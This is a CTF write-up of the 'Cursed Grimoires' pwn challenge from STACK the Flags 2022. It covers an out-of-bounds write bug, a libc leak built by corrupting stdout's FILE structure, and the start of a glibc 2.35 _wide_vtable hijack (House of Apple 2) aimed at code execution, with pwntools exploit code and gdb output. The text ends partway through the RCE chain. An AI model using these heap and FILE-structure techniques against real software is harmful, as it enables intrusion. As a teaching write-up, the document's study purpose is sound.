STACK the Flags CTF 2022

WriteUp 1年前 (2022) admin
892 0 0

STACK the Flags CTF 2022

Last weekend, I spent my time competing at STACK the Flags CTF 2022 held by GovTech SG with team PDKT then sad. We got 2nd place in the Open Category. Thanks a lot to GovTech SG for the amazing CTF!

On this CTF, I managed to solve all of the pwn challenges, and today, I will make a writeup on one of the challenges called Cursed Grimoires, because my solution for that challenge is related to the FILE Structure Attack on the recent GLIBC 2.35 (I’ve made a promise before to continue my FILE Structure Attack series, so I try to make this writeup as detailed as possible during explaining the FILE Structure part).

I recommend you to read my first article about FILE Structure Attack in here to get a basic understanding of how FILE Structure Attack works. You can say that this post is like the second part of that article, but focusing only in the glibc 2.35.

Cursed Grimoires

Initial Analysis

We were given a zip file containing the challenge binary called cursed_grimoires and the libc file that is being used to run the binary. Let’s start the analysis by checking the properties of the binary via checksec.

1
2
3
4
5
6
╰─❯ checksec cursed_grimoires
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

As we can see, the binary:

  • Full RELRO: It means we can’t modify the GOT table.
  • Canary found: It means the binary tries to protect against buffer overflow by storing a canary value in the stack (Which will throw an error if we do buffer overflow and overwrite it with an incorrect value).
  • NX enabled: It means the stack area isn’t executable (We can’t jump to the address in the stack area).
  • PIE enabled: It means the address of the binary’s functions itself will be randomized on each execution.

Now, let’s check the libc version

1
2
╰─❯ ./libc.so.6
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35.

Okay, the binary used glibc 2.35, which is quite hard to be exploited.

Now that we have known the properties, seems like the mitigation are quite strong. Let’s continue our analysis by disassembling the binary methods one by one.

main

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  setup_IO(argc, argv, envp);
  v3 = 0;
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      printf("\nEnter choice => ");
      __isoc99_scanf("%d", &v3);
      if ( v3 != 1 )
        break;
      create_grimoire();
    }
    if ( v3 != 2 )
      exit(0);
    edit_grimoire();
  }
}

From the main function, it will call menu() on each iteration, and we can see that there are three menus that we can select based on our choice’s input, create_grimoire, edit_grimoire, and exit. Let’s continue our analysis by disassembling those methods.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
unsigned __int64 menu()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  v1 = __readfsqword(0x28u);
  printf("\x1B[2J\x1B[H");
  puts(s);
  puts("1. Create Grimoire (Only once)");
  puts("2. Edit Grimoire");
  puts("3. Finish Grimoire");
  return v1 - __readfsqword(0x28u);
}

Okay, this method just prints the available menus and the number that we should input to choose one of the available menus.

create_grimoire

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
unsigned __int64 create_grimoire()
{
  size_t size; // [rsp+0h] [rbp-10h] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("\x1B[2J\x1B[H");
  if ( !GRIMOIRE )
  {
    printf("Size of grimoire => ");
    size = 0LL;
    __isoc99_scanf("%zu", &size);
    while ( getchar() != 10 )
      ;
    GRIMOIRE = (char *)malloc(size);
    printf("Write your contents => ");
    fgets(GRIMOIRE, size - 1, stdin);
  }
  return v2 - __readfsqword(0x28u);
}

From the disassemble’s result, we can see that the create_grimoire method will do three sequential operations:

  • Check whether the global variable GRIMOIRE is null or not. This means that we can call create_grimoire only one time per execution.
  • Ask for the size of the grimoire, and then it will call malloc to create a new chunk with the input size.
  • Ask for the content of the newly created chunk.

One thing that we can notice in this method is that we can set a big size for the chunk that we want to create because there isn’t any restriction. Keep this in mind first because this will be useful later. Let’s move to the edit_grimoire method.

edit_grimoire

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
unsigned __int64 edit_grimoire()
{
  char v1; // [rsp+3h] [rbp-Dh]
  int v2; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("\x1B[2J\x1B[H");
  if ( GRIMOIRE )
  {
    printf("Index to edit => ");
    __isoc99_scanf("%d", &v2);
    while ( getchar() != 10 )
      ;
    printf("Replacement => ");
    v1 = getchar();
    while ( getchar() != 10 )
      ;
    GRIMOIRE[v2] = v1;
  }
  return v3 - __readfsqword(0x28u);
}

At a glance, we can see that this method will allow us to edit the content of the newly allocated chunk. It will only allow us to edit one char per call (Give the index, and then it will replace the stored value in the given index with the new value that you just gave).

If we read this function method carefully, notice that there is a bug in this method. There isn’t any check whether the index that we give is a valid index or not (valid means the index is still inside the allocated chunk’s area). This means that we can do Out-Of-Bounds write on any address that we like, relative to the chunks.

To summarize, some important notes that we have taken from our analysis:

  • There are three menus that we can choose (create, edit, and exit).
  • We can allocate one chunk with any size that we want.
  • There is a bug in the edit method which leads us to OOB write on any address that we want (relative to our allocated chunk’s address)

Exploitation

Now, based on those important notes, we need to think about how to abuse the OOB bug that we found so that we can leverage it into Remote-Code-Execution (RCE). Up until now:

  • Even though we have an OOB write, due to ASLR (address randomization), we don’t know the exact address of our created chunk in the heap nor the offset difference between our targeted address with our chunk.

Leveraging the OOB bug with malloc behavior

So, what should we do? Remember that in this binary, we are allowed to allocate a chunk of any size. Let’s check the manuals of the malloc. Turns out, there are some interesting notes in the man malloc result.

1
2
3
4
5
6
7
NOTES
       By default, Linux follows an optimistic memory allocation strategy.  This means that when malloc() returns non-NULL there is no guarantee that the memory really is available.  In  case  it
       turns  out  that  the  system  is  out  of  memory, one or more processes will be killed by the OOM killer.  For more information, see the description of /proc/sys/vm/overcommit_memory and
       /proc/sys/vm/oom_adj in proc(5), and the Linux kernel source file Documentation/vm/overcommit-accounting.rst.

       Normally, malloc() allocates memory from the heap, and adjusts the size of the heap as required, using sbrk(2).  When allocating blocks of memory  larger  than  MMAP_THRESHOLD  bytes,  the
       glibc  malloc()  implementation allocates the memory as a private anonymous mapping using mmap(2).

Based on the notes, if we call malloc() with a big size, it will place our chunk in the mmapped page rather than the heap area. And reading through this article that I found, we can learn that a new page created by mmap will have a consistent offset difference from the libc starting area address. To prove this, let’s fire up our gdb to run the binary multiple time and test it by allocating a chunk with size 1000000.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
gef➤  x/gx &GRIMOIRE
0x55e0067dd030 <GRIMOIRE>:      0x00007f3b78939010
gef➤  vmmap
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x000055e0067d9000 0x000055e0067da000 0x0000000000000000 r-- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x000055e0067da000 0x000055e0067db000 0x0000000000001000 r-x /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x000055e0067db000 0x000055e0067dc000 0x0000000000002000 r-- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x000055e0067dc000 0x000055e0067dd000 0x0000000000002000 r-- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x000055e0067dd000 0x000055e0067de000 0x0000000000003000 rw- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x000055e0067de000 0x000055e0067df000 0x0000000000005000 rw- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x000055e007bc6000 0x000055e007be7000 0x0000000000000000 rw- [heap]
0x00007f3b78939000 0x00007f3b78a31000 0x0000000000000000 rw-
0x00007f3b78a31000 0x00007f3b78a59000 0x0000000000000000 r-- /home/chovid99/stf2022/grimories/libc.so.6

As you can see, the chunk was placed not in the heap, but in a new page created by the mmap, and it was placed just before the libc (The offset difference is 0x00007f3b78a31000 - 0x00007f3b78939010 = 0xf7ff0). Let’s try to run it one more time to confirm it.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
gef➤  x/gx &GRIMOIRE
0x555555558030 <GRIMOIRE>:      0x00007ffff7c9c010
gef➤  vmmap
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x0000555555554000 0x0000555555555000 0x0000000000000000 r-- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x0000555555555000 0x0000555555556000 0x0000000000001000 r-x /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x0000555555556000 0x0000555555557000 0x0000000000002000 r-- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x0000555555557000 0x0000555555558000 0x0000000000002000 r-- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x0000555555558000 0x0000555555559000 0x0000000000003000 rw- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x0000555555559000 0x000055555555a000 0x0000000000005000 rw- /home/chovid99/stf2022/grimories/cursed_grimoires_patched
0x000055555555a000 0x000055555557b000 0x0000000000000000 rw- [heap]
0x00007ffff7c9c000 0x00007ffff7d94000 0x0000000000000000 rw-
0x00007ffff7d94000 0x00007ffff7dbc000 0x0000000000000000 r-- /home/chovid99/stf2022/grimories/libc.so.6

Yup, we can confirm that when we allocated a big chunk, the libc_base_address will be at chunk_address + 0xf7ff0. With this piece of information, now that we can leverage our OOB bug to be able to overwrite any value stored in the libc area by setting the index to 0xf7ff0 + libc_target_offset.

Getting a libc leak

Now that we have the power to overwrite any writeable area in the loaded libc, what should we do now? Remember that up until now, we don’t have any libc address leak yet. So, it would be a good idea to try finding a way on getting the libc leak.

One of the ways that I could think of is using a FILE Structure Attack. If you don’t have any idea or this is your first time hearing about it, I had written some basic knowledge about it in one of my blog’s articles. I believe that reading through that article first will give you a strong fundamental to understand the exploit for this challenge.

One of the tricks related to FILE Structure Attack that we could do to leak the libc address is based on this article. The article explained the trick on leaking the libc, but I will try to break it down one by one again based on what I did to understand the article.

Remember that the menu() function will be called on each iteration and it calls puts. So, based on the previous article, if we deep dive into the implementation of puts in the glibc source code, we will get a way to get a libc leak.

Let’s start breaking it down one by one starting from the puts method itself.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
int
_IO_puts (const char *str)
{
  int result = EOF;
  size_t len = strlen (str);
  _IO_acquire_lock (stdout);

  if ((_IO_vtable_offset (stdout) != 0
       || _IO_fwide (stdout, -1) == -1)
      && _IO_sputn (stdout, str, len) == len
      && _IO_putc_unlocked ('\n', stdout) != EOF)
    result = MIN (INT_MAX, len + 1);

  _IO_release_lock (stdout);
  return result;
}

weak_alias (_IO_puts, puts)
libc_hidden_def (_IO_puts)

puts is an alias to _IO_puts. As you can see, the _IO_puts will call _IO_sputn (stdout, str, len), which based on this LOC in the glibc source code, is an alias to _IO_XSPUTN (__fp, __s, __n), which means it will jump to the stored pointer for __xsputn key in the stdout FILE.

Inspecting via GDB (or you can deep dive its source code as well), stdout vtable mapped the key __xsputn to the _IO_new_file_xsputn method.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
gef➤  print _IO_2_1_stdout_
$4 = {
  file = {
    _flags = 0xfbad2887,
    _IO_read_ptr = 0x7ffff7fae803 <_IO_2_1_stdout_+131> "\n",
    _IO_read_end = 0x7ffff7fae803 <_IO_2_1_stdout_+131> "\n",
    _IO_read_base = 0x7ffff7fae803 <_IO_2_1_stdout_+131> "\n",
    _IO_write_base = 0x7ffff7fae803 <_IO_2_1_stdout_+131> "\n",
    _IO_write_ptr = 0x7ffff7fae803 <_IO_2_1_stdout_+131> "\n",
    _IO_write_end = 0x7ffff7fae803 <_IO_2_1_stdout_+131> "\n",
...
    _wide_data = 0x7ffff7fad9a0 <_IO_wide_data_1>,
  },
  vtable = 0x7ffff7faa600 <__GI__IO_file_jumps>
}
gef➤  print __GI__IO_file_jumps
$5 = {
...
  __overflow = 0x7ffff7e20e40 <_IO_new_file_overflow>,
  __underflow = 0x7ffff7e20b30 <_IO_new_file_underflow>,
  __uflow = 0x7ffff7e21de0 <__GI__IO_default_uflow>,
  __pbackfail = 0x7ffff7e23300 <__GI__IO_default_pbackfail>,
  __xsputn = 0x7ffff7e1f680 <_IO_new_file_xsputn>,
...
  __write = 0x7ffff7e1ef40 <_IO_new_file_write>,
}

So now, let’s check the code.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
size_t
_IO_new_file_xsputn (FILE *f, const void *data, size_t n)
{
  const char *s = (const char *) data;
  size_t to_do = n;
  int must_flush = 0;
  size_t count = 0;

...

  if (to_do + must_flush > 0)
    {
      size_t block_size, do_write;
      /* Next flush the (full) buffer. */
      if (_IO_OVERFLOW (f, EOF) == EOF)
	/* If nothing else has to be written we must not signal the
	   caller that everything has been written.  */
	return to_do == 0 ? EOF : n - to_do;

      /* Try to maintain alignment: write a whole number of blocks.  */
      block_size = f->_IO_buf_end - f->_IO_buf_base;
      do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);

      if (do_write)
	{
	  count = new_do_write (f, s, do_write);
	  to_do -= count;
	  if (count < do_write)
	    return n - to_do;
	}

...

}
libc_hidden_ver (_IO_new_file_xsputn, _IO_file_xsputn)

If you read the code, it will call _IO_OVERFLOW(f, EOF) before calling new_do_write to write the actual string that we want to print. Based on the vtable above that we see in gdb (the _IO_file_jumps), calling _IO_OVERFLOW equivalents to jump to _IO_new_file_overflow. Let’s check the disassembly result of that method.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
int
_IO_new_file_overflow (FILE *f, int ch)
{
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
      f->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return EOF;
    }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
    {
      ...
    }
  if (ch == EOF)
    return _IO_do_write (f, f->_IO_write_base,
			 f->_IO_write_ptr - f->_IO_write_base);
  ...
}
libc_hidden_ver (_IO_new_file_overflow, _IO_file_overflow)

During calling this method, keep in mind first that the passed argument for ch is EOF. And notice this interesting LOC:

1
2
3
  if (ch == EOF)
    return _IO_do_write (f, f->_IO_write_base,
			 f->_IO_write_ptr - f->_IO_write_base);

If we disassemble _IO_do_write method and try to trace the method calls inside of it:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
int
_IO_new_do_write (FILE *fp, const char *data, size_t to_do)
{
  return (to_do == 0
	  || (size_t) new_do_write (fp, data, to_do) == to_do) ? 0 : EOF;
}
libc_hidden_ver (_IO_new_do_write, _IO_do_write)

static size_t
new_do_write (FILE *fp, const char *data, size_t to_do)
{
  size_t count;
  if (fp->_flags & _IO_IS_APPENDING)
    /* On a system without a proper O_APPEND implementation,
       you would need to sys_seek(0, SEEK_END) here, but is
       not needed nor desirable for Unix- or Posix-like systems.
       Instead, just indicate that offset (before and after) is
       unpredictable. */
    fp->_offset = _IO_pos_BAD;
  else if (fp->_IO_read_end != fp->_IO_write_base)
    {
      off64_t new_pos
	= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
      if (new_pos == _IO_pos_BAD)
	return 0;
      fp->_offset = new_pos;
    }
  count = _IO_SYSWRITE (fp, data, to_do);

...

}

...
#define _IO_SYSWRITE(FP, DATA, LEN) JUMP2 (__write, FP, DATA, LEN)
...

ssize_t
_IO_new_file_write (FILE *f, const void *data, ssize_t n)
{
  ssize_t to_do = n;
  while (to_do > 0)
    {
      ssize_t count = (__builtin_expect (f->_flags2
                                         & _IO_FLAGS2_NOTCANCEL, 0)
			   ? __write_nocancel (f->_fileno, data, to_do)
			   : __write (f->_fileno, data, to_do));
      if (count < 0)
	{
	  f->_flags |= _IO_ERR_SEEN;
	  break;
	}
      to_do -= count;
      data = (void *) ((char *) data + count);
    }
  n -= to_do;
  if (f->_offset >= 0)
    f->_offset += n;
  return n;
}

As you can see, _IO_do_write is an alias to _IO_new_do_write, which eventually will call new_do_write, and finally, it will call _IO_SYSWRITE (fp, data, to_do). _IO_SYSWRITE will jump to the vtable stored pointer mapped from key __write, which based on the vtable that we saw before in stdout, is equivalent to calling _IO_new_file_write. And finally, this method will call write(f->fileno, data, to_do)

To summarize, below are the possible chain calls that we can trigger when we call puts:

1
2
3
4
5
6
puts(str)
|_ _IO_new_file_xsputn (stdout, str, len)
   |_ _IO_new_file_overflow (stdout, EOF)
      |_ new_do_write(stdout, stdout->_IO_write_base, stdout->_IO_write_ptr - stdout->_IO_write_base)
         |_ _IO_new_file_write(stdout, stdout->_IO_write_base, stdout->_IO_write_ptr - stdout->_IO_write_base)
            |_ write(stdout->fileno, stdout->_IO_write_base, stdout->_IO_write_ptr - stdout->_IO_write_base)

As you can see from the chain summary, during calling _IO_OVERFLOW inside the puts method, there is a possibility that we can call write(stdout->fileno, stdout->_IO_write_base, stdout->_IO_write_ptr - stdout->_IO_write_base).

Back to the gdb result of stdout that we see before, stdout->fileno is 1 and both stdout->_IO_write_base and stdout->_IO_write_ptr are currently pointing to the same address, and the address is part of the libc region. Taking the stdout->_IO_write_base address from the previous gdb result (which is 0x7ffff7fae803), let’s inspect on what is the content of the address.

1
2
3
4
5
6
7
8
gef➤  tele 0x7ffff7fae803
0x00007ffff7fae803│+0x0000: 0xfafa70000000000a ("\n"?)
0x00007ffff7fae80b│+0x0008: 0xffffff00007ffff7
...
gef➤  tele 0x7ffff7fae803+5
0x00007ffff7fae808│+0x0000: 0x00007ffff7fafa70  →  0x0000000000000000
0x00007ffff7fae810│+0x0008: 0xffffffffffffffff
...

As you can see, there is a libc address inside the address pointed by the _IO_write_base, specifically _IO_write_base+5. So, if we’re somehow able to overwrite the _IO_write_ptraddress of the stdout, so that it won’t be pointing to the same address as _IO_write_base(making _IO_write_ptr > _IO_write_base), we will get a libc leak during calling puts, because when puts called _IO_OVERFLOW, it will eventually call write(1, _IO_write_base, _IO_write_ptr - _IO_write_base), which instructing it to print the content between the range of the _IO_write_ptr and _IO_write_base.

However, notes that there are some constraints that we need to fulfill so that we can successfully execute that chain:

  • During calling _IO_new_file_overflow, notice that we need to bypass these checks before calling the _IO_do_write:
    • if (f->_flags & _IO_NO_WRITES) needs to return False.
      • So, _IO_NO_WRITES is 0x0008, which mean stdout->_flags & 0x0008 should be 0
    • if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)needs to return False.
      • _IO_write_base == NULL will always return False because it points to the libc area.
      • (stdout->_flags & _IO_CURRENTLY_PUTTING) == 0 needs to return False as well. _IO_CURRENTLY_PUTTING is 0x0800, which mean stdout->_flags & 0x0800 should be 1
    • if (ch == EOF) needs to return True.
      • This will always be satisfied because puts always set the ch to EOF.
  • Move to the new_do_write, we need to skip the second if condition, so we need to:
    • Make this if (fp->_flags & _IO_IS_APPENDING) return True.

So, based on the above constraints, what value that we need to set for the stdout->_flags is 0x1800, so that:

1
2
3
_flags & _IO_NO_WRITES         == 0
_flags & _IO_CURRENTLY_PUTTING == 1
_flags & _IO_IS_APPENDING      == 1

Now, with the OOB bug, we can get a libc leak. What should we do are:

  • Overwrite the stdout->_flags with 0x1800
  • Overwrite the last byte of stdout->_IO_write_ptr to be larger than stdout->_IO_write_base.

By doing this, we will get a libc leak when the binary prints the menu.

Let’s start building our exploit by creating some helpers:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
def create(r, size, content):
    r.sendlineafter(b'=> ', b'1')
    r.sendlineafter(b'=> ', str(size).encode())
    r.sendlineafter(b'=> ', content)

def edit(r, offset, val):
    r.sendlineafter(b'=> ', b'2')
    r.sendlineafter(b'=> ', str(offset).encode())
    r.sendlineafter(b'=> ', bytes([val]))

def exit_binary(r):
    r.sendlineafter(b'=> ', b'3')
    r.interactive()

And then, allocate a big chunk:

1
2
3
4
5
# Create a big chunk, so that our chunk is located on the newly page
# created by mmap (To be precise, at libc_base-0xf7ff0)
chunk_size      = 1000000
offset_to_libc  = 0xf7ff0
create(r, chunk_size, b'a'*8)

Now, let’s start overwriting the _flags

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
'''
Leak libc base via stdout
'''
# Prepare the correct offset for stdout and stderr
stdout_offset_from_chunk = offset_to_libc + libc.symbols['_IO_2_1_stdout_']
stderr_offset_from_chunk = offset_to_libc + libc.symbols['_IO_2_1_stderr_']
log.info(f'Stdout offset: {hex(stdout_offset_from_chunk)}')
log.info(f'Stderr offset: {hex(stderr_offset_from_chunk)}')

# Overwrite stdout->_flags to 0x1800
flags_offset = 0x0  # stdout->_flags = &stdout + 0x0
flags = p32(0x1800)
for i in range(len(flags)):
    edit(r, stdout_offset_from_chunk+flags_offset+i, flags[i])

Now that we have successfully overwritten the stdout flags, let’s overwrite the _IO_write_ptr. After we do the edit, we will get a libc leak immediately because the binary will print the menu.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
# Overwrite stdout->_IO_write_ptr to be larger than
write_ptr_offset = 0x28 # stdout->_IO_write_ptr = &stdout + 0x28
write_ptr_lsb    = 0x50 # You can choose any value. I choose 0x50
edit(r, stdout_offset_from_chunk+write_ptr_offset, write_ptr_lsb)

# Now, when the binary called menu() (which will call puts())
# It will leak a libc address, which equivalents to _IO_stdfile_1_lock
out = r.recv(16)[5:]
leaked_libc = u64(out[:8])
log.info(f'Leaked libc  : {hex(leaked_libc)}')
libc_base = leaked_libc-libc.symbols['_IO_stdfile_1_lock']
log.info(f'Libc base    : {hex(libc_base)}')
libc.address = libc_base
chunk_addr = libc_base - 0xf7ff0
log.info(f'Chunk addr   : {hex(chunk_addr)}')

 

STACK the Flags CTF 2022

 

Above is the result of our current script. So now, we have successfully retrieved a libc leak. Time to move to the next step, which gaining code execution.

Gaining Remote Code Execution (RCE)

Up until now, we have:

  • OOB write to libc area.
  • Libc base address from the leak.

We need to leverage the OOB bug and the libc base address leaked info to gain RCE. One thing that comes in mind is using the knowledge that I gathered from the recent discussion about gaining RIP control from FILE structure attack in Glibc 2.35.

To give some context, in the old version of glibc, we can overwrite the file->vtable address with our fake vtable, so that let’s say when a method wants to call _IO_OVERFLOW, instead of jumping to the correct address, it will jump to our desired address that we set in our fake vtable.

However, this has been mitigated because the glibc will check whether the vtable that is stored in the FILE is in the correct region or not. Check the below LOCs:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
  /* Fast path: The vtable pointer is within the __libc_IO_vtables
     section.  */
  uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
  uintptr_t ptr = (uintptr_t) vtable;
  uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;
  if (__glibc_unlikely (offset >= section_length))
    /* The vtable pointer is not in the expected section.  Use the
       slow path, which will terminate the process if necessary.  */
    _IO_vtable_check ();
  return vtable;
}

#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)

#define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)

# define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))

#define _IO_JUMPS_FILE_plus(THIS) \
  _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE_plus, vtable)

Taking example let’s say a method tries to call _IO_OVERRFLOW, it will try to do the jump to the stored pointer in the vtable value mapped with key __overflow, and before jumping into it, it will validate first whether the stored pointer is in the valid area or not by calling IO_validate_vtable.

So that trick where we set up our fake vtable to jump to a method outside the vtable section area no longer works. However, because the check only validates whether the stored pointer is in vtable region or not, we can still misalign the table (For example, shift the vtable by one entry, so that when a function called _IO_OVERFLOW, it will jump to _IO_UNDERFLOW instead due to the misalignment).

People try to find a way to abuse this check, and recently in this article by kylebot, he found that the glibc does the check only when jumping with macro _IO_JUMPS_FUNC, but it didn’t validate the check when it uses a macro to jump to the wide_vtable, which is _IO_WIDE_JUMPS_FUNC.

Also turns out, there is another article that has been published a few months ago that tried to abuse the same finding from kylebot. The method is called House of Apple 2, which was posted by roderick01 in this article. I’ll try to explain it in more detail based on my understanding during reading these two blogs.

Remember that the mitigation those were implemented in the recent glibc only checks whether the vtable stored in the FILE properties is still in the correct region or not. And the standard vtablethat is being used for stdfile is _IO_file_jumps. But in fact, there is a lot of other vtable in the region that we can use, and one of them is _IO_wfile_jumps. Below is the default entry of the _IO_wfile_jumps printed via gdb:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
gef➤  print __GI__IO_wfile_jumps
$11 = {
  __dummy = 0x0,
  __dummy2 = 0x0,
  __finish = 0x7ffff7e20070 <_IO_new_file_finish>,
  __overflow = 0x7ffff7e1a410 <__GI__IO_wfile_overflow>,
  __underflow = 0x7ffff7e19050 <__GI__IO_wfile_underflow>,
  __uflow = 0x7ffff7e178c0 <__GI__IO_wdefault_uflow>,
  __pbackfail = 0x7ffff7e17680 <__GI__IO_wdefault_pbackfail>,
  __xsputn = 0x7ffff7e1a8c0 <__GI__IO_wfile_xsputn>,
  __xsgetn = 0x7ffff7e1f330 <__GI__IO_file_xsgetn>,
  __seekoff = 0x7ffff7e197d0 <__GI__IO_wfile_seekoff>,
  __seekpos = 0x7ffff7e22530 <_IO_default_seekpos>,
  __setbuf = 0x7ffff7e1e620 <_IO_new_file_setbuf>,
  __sync = 0x7ffff7e1a720 <__GI__IO_wfile_sync>,
  __doallocate = 0x7ffff7e13f10 <_IO_wfile_doallocate>,
  __read = 0x7ffff7e1f9b0 <__GI__IO_file_read>,
  __write = 0x7ffff7e1ef40 <_IO_new_file_write>,
  __seek = 0x7ffff7e1e6f0 <__GI__IO_file_seek>,
  __close = 0x7ffff7e1e610 <__GI__IO_file_close>,
  __stat = 0x7ffff7e1ef30 <__GI__IO_file_stat>,
  __showmanyc = 0x7ffff7e234a0 <_IO_default_showmanyc>,
  __imbue = 0x7ffff7e234b0 <_IO_default_imbue>
}

Let’s try to take a look at the implementation of one of the functions which is _IO_wfile_overflow(This is the path that was discovered by both kylebot and roderick01).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
wint_t
_IO_wfile_overflow (FILE *f, wint_t wch)
{
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
      f->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return WEOF;
    }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0)
    {
      /* Allocate a buffer if needed. */
      if (f->_wide_data->_IO_write_base == 0)
	{
	  _IO_wdoallocbuf (f);
	  ...
	}
      ...
}

void
_IO_wdoallocbuf (FILE *fp)
{
  if (fp->_wide_data->_IO_buf_base)
    return;
  if (!(fp->_flags & _IO_UNBUFFERED))
    if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)
      ...
}

#define _IO_WDOALLOCATE(FP) WJUMP0 (__doallocate, FP)

#define WJUMP0(FUNC, THIS) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS)

#define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)

#define _IO_WIDE_JUMPS(THIS) \
  _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable

As you can see in the above, if we’re able to trigger WJUMP0, there isn’t any validation check whether the wide_vtable stored pointer is in the correct region or not, which means if we’re able to forge a fake wide_vtable and trigger the macro call (WJUMP0), we can jump to any address that we want just like the old glibc.

Also notice that the vtable that was used during _IO_WIDE_JUMPS will be taken from the fp->_wide_data->_wide_vtable. If you revisit the stdfile fields when we inspect it in the gdb, you can see there the stdfile has a field called _wide_data, which points to another struct _IO_wide_data_1. Below is the field stored in the _IO_wide_data_1 printed via gdb:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
gef➤  print _IO_wide_data_1
$10 = {
  _IO_read_ptr = 0x0,
  _IO_read_end = 0x0,
  _IO_read_base = 0x0,
  _IO_write_base = 0x0,
  _IO_write_ptr = 0x0,
  _IO_write_end = 0x0,

...

  _shortbuf = L"",
  _wide_vtable = 0x7ffff7faa0c0 <__GI__IO_wfile_jumps> <- This is the one that we can overwrite with our fake vtable
}

Based on that information, this is the possible chain call to be achieved if we misaligned the FILE vtable from _IO_file_jumps to _IO_wfile_jumps and trigger __overflow call. Below is the chain:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
Assuming that we overwrite the FILE->vtable from _IO_file_jumps to _IO_wfile_jumps. When the binary try to call
_IO_OVERFLOW (fp, EOF), the chain would be:

_IO_OVERFLOW (fp, EOF)
|_ JUMP1 (__overflow, fp, EOF)
   |_ (_IO_JUMPS_FUNC(fp)->__overflow) (fp, EOF)
      |_ ((IO_validate_vtable (_IO_JUMPS_FILE_plus (fp)))->__overflow) (fp, EOF) <- Because we overwrite it to point to _IO_wfile_jumps, it will call _IO_wfile_overflow instead of _IO_new_file_overflow. This is still valid because its location is still in the correct region
         |_ _IO_wfile_overflow(fp, EOF)
            |_ _IO_wdoallocbuf(fp)
               |_ _IO_WDOALLOCATE(fp)
                  |_ WJUMP0 (__doallocate, fp)
